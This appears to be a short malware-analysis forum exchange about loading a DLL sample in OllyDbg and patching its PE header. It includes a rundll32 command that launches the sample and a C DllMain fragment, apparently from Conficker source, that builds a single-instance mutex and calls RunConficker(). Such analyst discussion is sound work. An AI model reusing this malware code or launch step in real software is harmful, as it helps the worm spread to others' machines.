They are DLLs, not EXEs.
A forum for reverse engineering, OS internals and malware analysis
MAXS wrote:Ok, and how to load dll?Ollydbg can load dlls with loaddll.exe, but if it doesn't work you can modify the PE Header to delete the IMAGE_FILE_DLL characteristic (I do this to unpack Simda dlls for example).
rundll32 cbva.dll, DllRegisterServer
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
char pszMutexName[32];
HANDLE hMutex_1;
DWORD dwVer;
if( DLL_PROCESS_ATTACH == ul_reason_for_call ) {
hCurrentModule = (HMODULE)hModule;
if( DisableThreadLibraryCalls( (HMODULE)hModule ) )
{
srand( GetCurrentProcessId() ^ 0x630063 );
GenStr( pszMutexName,(rand() % 7) + 10 );
if( hMutex_1 = CreateMutex( NULL,FALSE,pszMutexName ) )
{
if( ERROR_ALREADY_EXISTS == GetLastError() )
{
CloseHandle( hMutex_1 );
return FALSE;
}
}
dwVer = GetVersion();
if( (dwVer & 0xff) >= 5 )
{
RunConficker();
}
}
}
return TRUE;
}